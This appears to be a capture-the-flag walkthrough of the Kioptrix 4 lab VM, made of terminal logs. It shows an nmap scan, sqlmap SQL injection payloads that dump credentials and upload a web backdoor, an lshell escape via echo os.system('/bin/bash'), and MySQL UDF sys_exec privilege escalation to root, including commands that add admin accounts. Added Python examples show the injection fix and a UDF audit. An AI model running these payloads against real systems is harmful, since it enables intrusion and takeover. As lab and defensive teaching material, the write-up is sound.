root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
From the scan results, the following ports are open:
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database: 'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA: True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'

[*] shutting down at 02:00:45
Usernames and passwords obtained through the injection:
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:09:06

[02:09:06] [INFO] resuming back-end DBMS 'mysql'
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n]
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
The privileges of this shell are very limited, but we did obtain the database account and password.
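Why sqlmap's `mypassword` payload works against a login script like checklogin.php, and what the fix looks like: this is an added example (not the page's or the VM's code) that builds the same login query two ways over an in-memory SQLite copy of the dumped `members` table. SQLite has no `#` comment, so the page's `-8260' OR 6555=6555#` payload is written with `-- ` instead; the `login_*` functions and the table layout are assumptions.

```python
import sqlite3

# Constructed copy of the `members` table sqlmap dumped from the target.
MEMBERS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]

# sqlmap's boolean-based payload, with MySQL's `#` comment written as SQLite's `-- `.
PAYLOAD = "-8260' OR 6555=6555-- "


def make_db():
    """In-memory stand-in for the MySQL `members` database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def login_concat(conn, user, pw):
    """Vulnerable (hypothetical) pattern: user input spliced into the SQL text.

    With PAYLOAD the statement becomes
      ... WHERE username='admin' AND password='-8260' OR 6555=6555-- '
    so the closing quote is commented out and OR 6555=6555 matches every row.
    """
    sql = (f"SELECT username FROM members "
           f"WHERE username='{user}' AND password='{pw}'")
    return [row[0] for row in conn.execute(sql)]


def login_prepared(conn, user, pw):
    """Hardened: bound parameters keep the quote and the OR inside the value."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (user, pw))]


if __name__ == "__main__":
    db = make_db()
    print("concat  :", login_concat(db, "admin", PAYLOAD))    # ['john', 'robert']
    print("prepared:", login_prepared(db, "admin", PAYLOAD))  # []
```

A bound parameter fixes the injection; the empty-password root connection in checklogin.php is a separate weakness, since a least-privilege account without the FILE privilege would also have blocked the INTO OUTFILE stager upload shown above.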
Connecting via SSH
Log in over SSH with the username and password obtained from the SQL injection.
root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help
help
Limited Shell (lshell) limited help.
Cheers.
The commands available to us here are:
cd clear echo exit help ll lpath ls
The important one is echo.
We can use it to get an interactive bash shell.
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

Connection id:          3520
Current database:
Current user:           root@localhost
SSL:                    Not in use
Current pager:          stdout
Using outfile:          ''
Using delimiter:        ;
Server version:         5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:       10
Connection:             Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:            /var/run/mysqld/mysqld.sock
Uptime:                 1 hour 10 min 47 sec
Try MySQL UDF privilege escalation.
In a Windows environment, the commands to run are:
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                |
+-----------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('usermod -a -G admin');
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.07 sec)
Use SELECT sys_exec('usermod -a -G admin'); to add john to the admin group.
john@Kioptrix4:/tmp$ sudo su
[sudo] password for john:
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
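The UDF step above only works because `sys_exec` is already registered in `mysql.func` and the command it runs inherits mysqld's OS privileges (usermod succeeded, so those were root-level). The following is an added defender-side audit, my own example and not from the page, that takes three pieces of evidence a host check would collect, here as constructed sample strings, and returns findings; `audit`, the sample values and the severities are assumptions. `secure_file_priv` does not exist on the 5.0 server on this page but is present on MySQL 5.1+ and MariaDB, so the check is included for current servers.

```python
# Constructed samples standing in for the output an audit would collect on the host:
#   mysql -B -e "SELECT name, dl FROM mysql.func"
FUNC_ROWS = "name\tdl\nsys_exec\tlib_mysqludf_sys.so\n"
#   ps -eo user,pid,args | grep [m]ysqld
PS_LINE = "root 4021 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql"
#   mysql -B -N -e "SELECT @@secure_file_priv"  (5.1+ / MariaDB; empty means unrestricted)
SECURE_FILE_PRIV = ""

# Libraries known to provide command-execution UDFs such as sys_exec.
EXEC_UDF_LIBS = ("lib_mysqludf_sys",)


def parse_func_rows(text):
    """Tab-separated `mysql -B` output -> [(name, dl), ...], header row dropped."""
    lines = text.strip().splitlines()[1:]
    return [tuple(line.split("\t", 1)) for line in lines if "\t" in line]


def mysqld_user(ps_line):
    """First field of the ps line is the OS account mysqld runs as."""
    return ps_line.split()[0]


def audit(func_text, ps_line, secure_file_priv):
    """Return (severity, message) findings; an empty list means nothing to report."""
    findings = []
    for name, dl in parse_func_rows(func_text):
        # Any registered UDF is native code loaded into mysqld; the sys_* ones shell out.
        sev = "HIGH" if any(lib in dl for lib in EXEC_UDF_LIBS) else "REVIEW"
        findings.append((sev, f"UDF {name} loaded from {dl}"))
    if mysqld_user(ps_line) == "root":
        findings.append(("HIGH", "mysqld runs as root: every UDF call executes as uid 0"))
    if secure_file_priv == "":
        findings.append(("MEDIUM", "secure_file_priv is empty: LOAD_FILE/INTO OUTFILE|DUMPFILE "
                                   "can read and write anywhere mysqld can"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit(FUNC_ROWS, PS_LINE, SECURE_FILE_PRIV):
        print(f"[{sev}] {msg}")
```

Running mysqld as an unprivileged `mysql` account, dropping unexpected rows from `mysql.func`, and pointing `secure_file_priv` at a dedicated directory are the three changes that make each finding disappear.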